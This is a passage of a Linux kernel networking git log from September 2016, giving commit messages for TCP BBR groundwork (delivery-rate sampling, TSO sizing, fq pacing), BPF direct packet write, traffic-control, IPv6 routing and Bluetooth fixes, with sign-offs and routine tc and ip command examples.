For some congestion control algorithms, like the upcoming BBR module,
if the losses in recovery do not indicate congestion then we may
continue to raise cwnd multiplicatively in recovery. In such cases the
current multiplier will falsely limit the sending rate, much as if it
were limited by the application.

This commit adds an optional congestion control callback to use a
different multiplier to expand the TCP send buffer. For congestion
control modules that do not specificy this callback, TCP continues to
use the previous default of 2.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Acked-by: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:01 -04:00
Neal Cardwell
556c6b46d1 tcp: export tcp_mss_to_mtu() for congestion control modules
Export tcp_mss_to_mtu(), so that congestion control modules can use
this to help calculate a pacing rate.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:01 -04:00
Neal Cardwell
1b3878ca15 tcp: export tcp_tso_autosize() and parameterize minimum number of TSO segments
To allow congestion control modules to use the default TSO auto-sizing
algorithm as one of the ingredients in their own decision about TSO sizing:

1) Export tcp_tso_autosize() so that CC modules can use it.

2) Change tcp_tso_autosize() to allow callers to specify a minimum
   number of segments per TSO skb, in case the congestion control
   module has a different notion of the best floor for TSO skbs for
   the connection right now. For very low-rate paths or policed
   connections it can be appropriate to use smaller TSO skbs.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:00 -04:00
Neal Cardwell
ed6e7268b9 tcp: allow congestion control module to request TSO skb segment count
Add the tso_segs_goal() function in tcp_congestion_ops to allow the
congestion control module to specify the number of segments that
should be in a TSO skb sent by tcp_write_xmit() and
tcp_xmit_retransmit_queue(). The congestion control module can either
request a particular number of segments in TSO skb that we transmit,
or return 0 if it doesn't care.

This allows the upcoming BBR congestion control module to select small
TSO skb sizes if the module detects that the bottleneck bandwidth is
very low, or that the connection is policed to a low rate.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:00 -04:00
Yuchung Cheng
eb8329e0a0 tcp: export data delivery rate
This commit export two new fields in struct tcp_info:

  tcpi_delivery_rate: The most recent goodput, as measured by
    tcp_rate_gen(). If the socket is limited by the sending
    application (e.g., no data to send), it reports the highest
    measurement instead of the most recent. The unit is bytes per
    second (like other rate fields in tcp_info).

  tcpi_delivery_rate_app_limited: A boolean indicating if the goodput
    was measured when the socket's throughput was limited by the
    sending application.

This delivery rate information can be useful for applications that
want to know the current throughput the TCP connection is seeing,
e.g. adaptive bitrate video streaming. It can also be very useful for
debugging or troubleshooting.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:00 -04:00
Soheil Hassas Yeganeh
d7722e8570 tcp: track application-limited rate samples
This commit adds code to track whether the delivery rate represented
by each rate_sample was limited by the application.

Upon each transmit, we store in the is_app_limited field in the skb a
boolean bit indicating whether there is a known "bubble in the pipe":
a point in the rate sample interval where the sender was
application-limited, and did not transmit even though the cwnd and
pacing rate allowed it.

This logic marks the flow app-limited on a write if *all* of the
following are true:

  1) There is less than 1 MSS of unsent data in the write queue
     available to transmit.

  2) There is no packet in the sender's queues (e.g. in fq or the NIC
     tx queue).

  3) The connection is not limited by cwnd.

  4) There are no lost packets to retransmit.

The tcp_rate_check_app_limited() code in tcp_rate.c determines whether
the connection is application-limited at the moment. If the flow is
application-limited, it sets the tp->app_limited field. If the flow is
application-limited then that means there is effectively a "bubble" of
silence in the pipe now, and this silence will be reflected in a lower
bandwidth sample for any rate samples from now until we get an ACK
indicating this bubble has exited the pipe: specifically, until we get
an ACK for the next packet we transmit.

When we send every skb we record in scb->tx.is_app_limited whether the
resulting rate sample will be application-limited.

The code in tcp_rate_gen() checks to see when it is safe to mark all
known application-limited bubbles of silence as having exited the
pipe. It does this by checking to see when the delivered count moves
past the tp->app_limited marker. At this point it zeroes the
tp->app_limited marker, as all known bubbles are out of the pipe.

We make room for the tx.is_app_limited bit in the skb by borrowing a
bit from the in_flight field used by NV to record the number of bytes
in flight. The receive window in the TCP header is 16 bits, and the
max receive window scaling shift factor is 14 (RFC 1323). So the max
receive window offered by the TCP protocol is 2^(16+14) = 2^30. So we
only need 30 bits for the tx.in_flight used by NV.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:00 -04:00
Yuchung Cheng
b9f64820fb tcp: track data delivery rate for a TCP connection
This patch generates data delivery rate (throughput) samples on a
per-ACK basis. These rate samples can be used by congestion control
modules, and specifically will be used by TCP BBR in later patches in
this series.

Key state:

tp->delivered: Tracks the total number of data packets (original or not)
	       delivered so far. This is an already-existing field.

tp->delivered_mstamp: the last time tp->delivered was updated.

Algorithm:

A rate sample is calculated as (d1 - d0)/(t1 - t0) on a per-ACK basis:

  d1: the current tp->delivered after processing the ACK
  t1: the current time after processing the ACK

  d0: the prior tp->delivered when the acked skb was transmitted
  t0: the prior tp->delivered_mstamp when the acked skb was transmitted

When an skb is transmitted, we snapshot d0 and t0 in its control
block in tcp_rate_skb_sent().

When an ACK arrives, it may SACK and ACK some skbs. For each SACKed
or ACKed skb, tcp_rate_skb_delivered() updates the rate_sample struct
to reflect the latest (d0, t0).

Finally, tcp_rate_gen() generates a rate sample by storing
(d1 - d0) in rs->delivered and (t1 - t0) in rs->interval_us.

One caveat: if an skb was sent with no packets in flight, then
tp->delivered_mstamp may be either invalid (if the connection is
starting) or outdated (if the connection was idle). In that case,
we'll re-stamp tp->delivered_mstamp.

At first glance it seems t0 should always be the time when an skb was
transmitted, but actually this could over-estimate the rate due to
phase mismatch between transmit and ACK events. To track the delivery
rate, we ensure that if packets are in flight then t0 and and t1 are
times at which packets were marked delivered.

If the initial and final RTTs are different then one may be corrupted
by some sort of noise. The noise we see most often is sending gaps
caused by delayed, compressed, or stretched acks. This either affects
both RTTs equally or artificially reduces the final RTT. We approach
this by recording the info we need to compute the initial RTT
(duration of the "send phase" of the window) when we recorded the
associated inflight. Then, for a filter to avoid bandwidth
overestimates, we generalize the per-sample bandwidth computation
from:

    bw = delivered / ack_phase_rtt

to the following:

    bw = delivered / max(send_phase_rtt, ack_phase_rtt)

In large-scale experiments, this filtering approach incorporating
send_phase_rtt is effective at avoiding bandwidth overestimates due to
ACK compression or stretched ACKs.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:00 -04:00
Neal Cardwell
0682e6902a tcp: count packets marked lost for a TCP connection
Count the number of packets that a TCP connection marks lost.

Congestion control modules can use this loss rate information for more
intelligent decisions about how fast to send.

Specifically, this is used in TCP BBR policer detection. BBR uses a
high packet loss rate as one signal in its policer detection and
policer bandwidth estimation algorithm.

The BBR policer detection algorithm cannot simply track retransmits,
because a retransmit can be (and often is) an indicator of packets
lost long, long ago. This is particularly true in a long CA_Loss
period that repairs the initial massive losses when a policer kicks
in.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:00 -04:00
Eric Dumazet
b2d3ea4a73 tcp: switch back to proper tcp_skb_cb size check in tcp_init()
Revert to the tcp_skb_cb size check that tcp_init() had before commit
b4772ef879 ("net: use common macro for assering skb->cb[] available
size in protocol families"). As related commit 744d5a3e9f ("net:
move skb->dropcount to skb->cb[]") explains, the
sock_skb_cb_check_size() mechanism was added to ensure that there is
space for dropcount, "for protocol families using it". But TCP is not
a protocol using dropcount, so tcp_init() doesn't need to provision
space for dropcount in the skb->cb[], and thus we can revert to the
older form of the tcp_skb_cb size check. Doing so allows TCP to use 4
more bytes of the skb->cb[] space.

Fixes: b4772ef879 ("net: use common macro for assering skb->cb[] available size in protocol families")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:00 -04:00
Eric Dumazet
77879147a3 net_sched: sch_fq: add low_rate_threshold parameter
This commit adds to the fq module a low_rate_threshold parameter to
insert a delay after all packets if the socket requests a pacing rate
below the threshold.

This helps achieve more precise control of the sending rate with
low-rate paths, especially policers. The basic issue is that if a
congestion control module detects a policer at a certain rate, it may
want fq to be able to shape to that policed rate. That way the sender
can avoid policer drops by having the packets arrive at the policer at
or just under the policed rate.

The default threshold of 550Kbps was chosen analytically so that for
policers or links at 500Kbps or 512Kbps fq would very likely invoke
this mechanism, even if the pacing rate was briefly slightly above the
available bandwidth. This value was then empirically validated with
two years of production testing on YouTube video servers.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:00 -04:00
Neal Cardwell
6403389211 tcp: use windowed min filter library for TCP min_rtt estimation
Refactor the TCP min_rtt code to reuse the new win_minmax library in
lib/win_minmax.c to simplify the TCP code.

This is a pure refactor: the functionality is exactly the same. We
just moved the windowed min code to make TCP easier to read and
maintain, and to allow other parts of the kernel to use the windowed
min/max filter code.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:22:59 -04:00
Soheil Hassas Yeganeh
f78e73e27f tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict
The upcoming change "lib/win_minmax: windowed min or max estimator"
introduces a struct called minmax, which is then included in
include/linux/tcp.h in the upcoming change "tcp: use windowed min
filter library for TCP min_rtt estimation". This would create a
compilation error for tcp_cdg.c, which defines its own minmax
struct. To avoid this naming conflict (and potentially others in the
future), this commit renames the version used in tcp_cdg.c to
cdg_minmax.

Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Kenneth Klette Jonassen <kennetkl@ifi.uio.no>
Acked-by: Kenneth Klette Jonassen <kennetkl@ifi.uio.no>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:22:59 -04:00
Jamal Hadi Salim
aecc5cefc3 net sched actions: fix GETing actions
With the batch changes that translated transient actions into
a temporary list lost in the translation was the fact that
tcf_action_destroy() will eventually delete the action from
the permanent location if the refcount is zero.

Example of what broke:
...add a gact action to drop
sudo $TC actions add action drop index 10
...now retrieve it, looks good
sudo $TC actions get action gact index 10
...retrieve it again and find it is gone!
sudo $TC actions get action gact index 10

Fixes: 22dc13c837 ("net_sched: convert tcf_exts from list to pointer array"),
Fixes: 824a7e8863 ("net_sched: remove an unnecessary list_del()")
Fixes: f07fed82ad ("net_sched: remove the leftover cleanup_a()")

Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-20 23:34:55 -04:00
Daniel Borkmann
36bbef52c7 bpf: direct packet write and access for helpers for clsact progs
This work implements direct packet access for helpers and direct packet
write in a similar fashion as already available for XDP types via commits
4acf6c0b84 ("bpf: enable direct packet data write for xdp progs") and
6841de8b0d ("bpf: allow helpers access the packet directly"), and as a
complementary feature to the already available direct packet read for tc
(cls/act) programs.

For enabling this, we need to introduce two helpers, bpf_skb_pull_data()
and bpf_csum_update(). The first is generally needed for both, read and
write, because they would otherwise only be limited to the current linear
skb head. Usually, when the data_end test fails, programs just bail out,
or, in the direct read case, use bpf_skb_load_bytes() as an alternative
to overcome this limitation. If such data sits in non-linear parts, we
can just pull them in once with the new helper, retest and eventually
access them.

At the same time, this also makes sure the skb is uncloned, which is, of
course, a necessary condition for direct write. As this needs to be an
invariant for the write part only, the verifier detects writes and adds
a prologue that is calling bpf_skb_pull_data() to effectively unclone the
skb from the very beginning in case it is indeed cloned. The heuristic
makes use of a similar trick that was done in 233577a220 ("net: filter:
constify detection of pkt_type_offset"). This comes at zero cost for other
programs that do not use the direct write feature. Should a program use
this feature only sparsely and has read access for the most parts with,
for example, drop return codes, then such write action can be delegated
to a tail called program for mitigating this cost of potential uncloning
to a late point in time where it would have been paid similarly with the
bpf_skb_store_bytes() as well. Advantage of direct write is that the
writes are inlined whereas the helper cannot make any length assumptions
and thus needs to generate a call to memcpy() also for small sizes, as well
as cost of helper call itself with sanity checks are avoided. Plus, when
direct read is already used, we don't need to cache or perform rechecks
on the data boundaries (due to verifier invalidating previous checks for
helpers that change skb->data), so more complex programs using rewrites
can benefit from switching to direct read plus write.

For direct packet access to helpers, we save the otherwise needed copy into
a temp struct sitting on stack memory when use-case allows. Both facilities
are enabled via may_access_direct_pkt_data() in verifier. For now, we limit
this to map helpers and csum_diff, and can successively enable other helpers
where we find it makes sense. Helpers that definitely cannot be allowed for
this are those part of bpf_helper_changes_skb_data() since they can change
underlying data, and those that write into memory as this could happen for
packet typed args when still cloned. bpf_csum_update() helper accommodates
for the fact that we need to fixup checksum_complete when using direct write
instead of bpf_skb_store_bytes(), meaning the programs can use available
helpers like bpf_csum_diff(), and implement csum_add(), csum_sub(),
csum_block_add(), csum_block_sub() equivalents in eBPF together with the
new helper. A usage example will be provided for iproute2's examples/bpf/
directory.

Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-20 23:32:11 -04:00
pravin shelar
2279994d07 openvswitch: avoid resetting flow key while installing new flow.
since commit commit db74a3335e ("openvswitch: use percpu
flow stats") flow alloc resets flow-key. So there is no need
to reset the flow-key again if OVS is using newly allocated
flow-key.

Signed-off-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-20 22:54:35 -04:00
pravin shelar
190aa3e778 openvswitch: Fix Frame-size larger than 1024 bytes warning.
There is no need to declare separate key on stack,
we can just use sw_flow->key to store the key directly.

This commit fixes following warning:

net/openvswitch/datapath.c: In function ‘ovs_flow_cmd_new’:
net/openvswitch/datapath.c:1080:1: warning: the frame size of 1040 bytes
is larger than 1024 bytes [-Wframe-larger-than=]

Signed-off-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-20 22:54:35 -04:00
David S. Miller
204dfe1798 Merge branch 'for-upstream' of git://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next
Johan Hedberg says:

====================
pull request: bluetooth-next 2016-09-19

Here's the main bluetooth-next pull request for the 4.9 kernel.

 - Added new messages for monitor sockets for better mgmt tracing
 - Added local name and appearance support in scan response
 - Added new Qualcomm WCNSS SMD based HCI driver
 - Minor fixes & cleanup to 802.15.4 code
 - New USB ID to btusb driver
 - Added Marvell support to HCI UART driver
 - Add combined LED trigger for controller power
 - Other minor fixes here and there

Please let me know if there are any issues pulling. Thanks.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-20 22:52:50 -04:00
John Crispin
092183df0f net-next: dsa: make the set_addr() operation optional
Only 1 of the 3 drivers currently has a set_addr() operation. Make the
set_addr() callback optional to reduce the amount of empty stubs inside
the drivers.

Signed-off-by: John Crispin <john@phrozen.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-20 04:47:44 -04:00
John Crispin
06f8ec9041 net-next: dsa: fix duplicate invocation of set_addr()
commit 83c0afaec7 ("net: dsa: Add new binding implementation")
has a duplicate invocation of the set_addr() operation callback. Remove one
of them.

Signed-off-by: John Crispin <john@phrozen.org>
Reviewed-by: Andrew Lunn <andrew@lunn.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-20 04:47:44 -04:00
Herbert Xu
83e7e4ce9e mac80211: Use rhltable instead of rhashtable
mac80211 currently uses rhashtable with insecure_elasticity set
to true.  The latter is because of duplicate objects.  What's
more, mac80211 walks the rhashtable chains by hand which is broken
as rhashtable may contain multiple tables due to resizing or
rehashing.

This patch fixes it by converting it to the newly added rhltable
interface which is designed for use with duplicate objects.

With rhltable a lookup returns a list of objects instead of a
single one.  This is then fed into the existing for_each_sta_info
macro.

This patch also deletes the sta_addr_hash function since rhashtable
defaults to jhash.

Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-20 04:43:36 -04:00
Vincent Bernat
a435a07f91 net: ipv6: fallback to full lookup if table lookup is unsuitable
Commit 8c14586fc3 ("net: ipv6: Use passed in table for nexthop
lookups") introduced a regression: insertion of an IPv6 route in a table
not containing the appropriate connected route for the gateway but which
contained a non-connected route (like a default gateway) fails while it
was previously working:

    $ ip link add eth0 type dummy
    $ ip link set up dev eth0
    $ ip addr add 2001:db8::1/64 dev eth0
    $ ip route add ::/0 via 2001:db8::5 dev eth0 table 20
    $ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
    RTNETLINK answers: No route to host
    $ ip -6 route show table 20
    default via 2001:db8::5 dev eth0  metric 1024  pref medium

After this patch, we get:

    $ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
    $ ip -6 route show table 20
    2001:db8:cafe::1 via 2001:db8::6 dev eth0  metric 1024  pref medium
    default via 2001:db8::5 dev eth0  metric 1024  pref medium

Fixes: 8c14586fc3 ("net: ipv6: Use passed in table for nexthop lookups")
Signed-off-by: Vincent Bernat <vincent@bernat.im>
Acked-by: David Ahern <dsa@cumulusnetworks.com>
Tested-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-20 03:28:29 -04:00
Jamal Hadi Salim
5a7a5555a3 net sched: stylistic cleanups
Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 22:04:14 -04:00
Roman Mashak
f71b109f17 net sched actions police: peg drop stats for conforming traffic
setting conforming action to drop is a valid policy.
When it is set we need to at least see the stats indicating it
for debugging.

Signed-off-by: Roman Mashak <mrv@mojatatu.com>
Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 22:04:14 -04:00
Jamal Hadi Salim
408fbc22ef net sched ife action: Introduce skb tcindex metadata encap decap
Sample use case of how this is encoded:
user space via tuntap (or a connected VM/Machine/container)
encodes the tcindex TLV.

Sample use case of decoding:
IFE action decodes it and the skb->tc_index is then used to classify.
So something like this for encoded ICMP packets:

.. first decode then reclassify... skb->tcindex will be set
sudo $TC filter add dev $ETH parent ffff: prio 2 protocol 0xbeef \
u32 match u32 0 0 flowid 1:1 \
action ife decode reclassify

...next match the decode icmp packet...
sudo $TC filter add dev $ETH parent ffff: prio 4 protocol ip \
u32 match ip protocol 1 0xff flowid 1:1 \
action continue

... last classify it using the tcindex classifier and do someaction..
sudo $TC filter add dev $ETH parent ffff: prio 5 protocol ip \
handle 0x11 tcindex classid 1:1 \
action blah..

Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 21:55:28 -04:00
Jamal Hadi Salim
6a5d58b67e net sched ife action: add 16 bit helpers
encoder and checker for 16 bits metadata

Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 21:55:28 -04:00
Steffen Klassert
07b26c9454 gso: Support partial splitting at the frag_list pointer
Since commit 8a29111c7 ("net: gro: allow to build full sized skb")
gro may build buffers with a frag_list. This can hurt forwarding
because most NICs can't offload such packets, they need to be
segmented in software. This patch splits buffers with a frag_list
at the frag_list pointer into buffers that can be TSO offloaded.

Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
Acked-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 20:59:34 -04:00
Johannes Weiner
d979a39d72 cgroup: duplicate cgroup reference when cloning sockets
When a socket is cloned, the associated sock_cgroup_data is duplicated
but not its reference on the cgroup.  As a result, the cgroup reference
count will underflow when both sockets are destroyed later on.

Fixes: bd1060a1d6 ("sock, cgroup: add sock->sk_cgroup")
Link: http://lkml.kernel.org/r/20160914194846.11153-2-hannes@cmpxchg.org
Signed-off-by: Johannes Weiner <hannes@cmpxchg.org>
Acked-by: Tejun Heo <tj@kernel.org>
Cc: Michal Hocko <mhocko@suse.cz>
Cc: Vladimir Davydov <vdavydov@virtuozzo.com>
Cc: <stable@vger.kernel.org>	[4.5+]
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-09-19 15:36:17 -07:00
Michał Narajowski
af4168c5a9 Bluetooth: Set appearance only for LE capable controllers
Setting appearance on controllers without LE support will result
in No Supported error.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 21:48:22 +03:00
Michał Narajowski
e74317f43f Bluetooth: Fix missing ext info event when setting appearance
This patch adds missing event when setting appearance, just like
in the set local name command.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:33:27 +02:00
Michał Narajowski
5e9fae48f8 Bluetooth: Add supported data types to ext info changed event
This patch adds EIR data to extended info changed event.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:33:27 +02:00
Szymon Janc
6a9e90bff9 Bluetooth: Add appearance to Read Ext Controller Info command
If LE is enabled appearance is added to EIR data.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:33:27 +02:00
Michał Narajowski
cde7a863d3 Bluetooth: Factor appending EIR to separate helper
This will also be used for Extended Information Event handling.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:33:27 +02:00
Szymon Janc
7d5c11da1f Bluetooth: Refactor read_ext_controller_info handler
There is no need to allocate heap for reply only to copy stack data to
it. This also fix rp memory leak and missing hdev unlock if kmalloc
failed.

Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:33:27 +02:00
Szymon Janc
3310230c5d Bluetooth: Increment management interface revision
Increment the mgmt revision due to the recently added
Read Extended Controller Information and Set Appearance commands.

Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Szymon Janc
9c9db78dc0 Bluetooth: Fix advertising instance validity check for flags
Flags are not allowed in Scan Response.

Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Szymon Janc
2bb36870e8 Bluetooth: Unify advertising instance flags check
This unifies max length and TLV validity checks.

Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Szymon Janc
5e2c59e84b Bluetooth: Remove unused parameter from tlv_data_is_valid function
hdev parameter is not used in function.

Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Michał Narajowski
c4960ecf2b Bluetooth: Add support for appearance in scan rsp
This patch enables prepending appearance value to scan response data.
It also adds support for setting appearance value through mgmt command.
If currently advertised instance has apperance flag set it is expired
immediately.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Michał Narajowski
7c295c4801 Bluetooth: Add support for local name in scan rsp
This patch enables appending local name to scan response data. If
currently advertised instance has name flag set it is expired
immediately.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Szymon Janc
83ebb9ec73 Bluetooth: Fix not registering BR/EDR SMP channel with force_bredr flag
If force_bredr is set SMP BR/EDR channel should also be for non-SC
capable controllers. Since hcidev flag is persistent wrt power toggle
it can be already set when calling smp_register(). This resulted in
SMP BR/EDR channel not being registered even if HCI_FORCE_BREDR_SMP
flag was set.

This also fix NULL pointer dereference when trying to disable
force_bredr after power cycle.

BUG: unable to handle kernel NULL pointer dereference at 0000000000000388
IP: [<ffffffffc0493ad8>] smp_del_chan+0x18/0x80 [bluetooth]

Call Trace:
[<ffffffffc04950ca>] force_bredr_smp_write+0xba/0x100 [bluetooth]
[<ffffffff8133be14>] full_proxy_write+0x54/0x90
[<ffffffff81245967>] __vfs_write+0x37/0x160
[<ffffffff813617f7>] ? selinux_file_permission+0xd7/0x110
[<ffffffff81356fbd>] ? security_file_permission+0x3d/0xc0
[<ffffffff810eb5b2>] ? percpu_down_read+0x12/0x50
[<ffffffff812462a5>] vfs_write+0xb5/0x1a0
[<ffffffff812476f5>] SyS_write+0x55/0xc0
[<ffffffff817eb872>] entry_SYSCALL_64_fastpath+0x1a/0xa4
Code: 48 8b 45 f0 eb c1 0f 1f 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f
      44 00 00 f6 05 c6 3b 02 00 04 55 48 89 e5 41 54 53 49 89 fc 75
      4b
      <49> 8b 9c 24 88 03 00 00 48 85 db 74 31 49 c7 84 24 88 03 00 00
RIP  [<ffffffffc0493ad8>] smp_del_chan+0x18/0x80 [bluetooth]
RSP <ffff8802aee3bd90>
CR2: 0000000000000388

Signed-off-by: Szymon Janc <szymon.janc@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Wei Yongjun
3e36ca483a Bluetooth: Use kzalloc instead of kmalloc/memset
Use kzalloc rather than kmalloc followed by memset with 0.

Generated by: scripts/coccinelle/api/alloc/kzalloc-simple.cocci

Signed-off-by: Wei Yongjun <weiyongjun1@huawei.com>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Frédéric Dalleau
3c0975a7a1 Bluetooth: Fix reason code used for rejecting SCO connections
A comment in the code states that SCO connection should be rejected
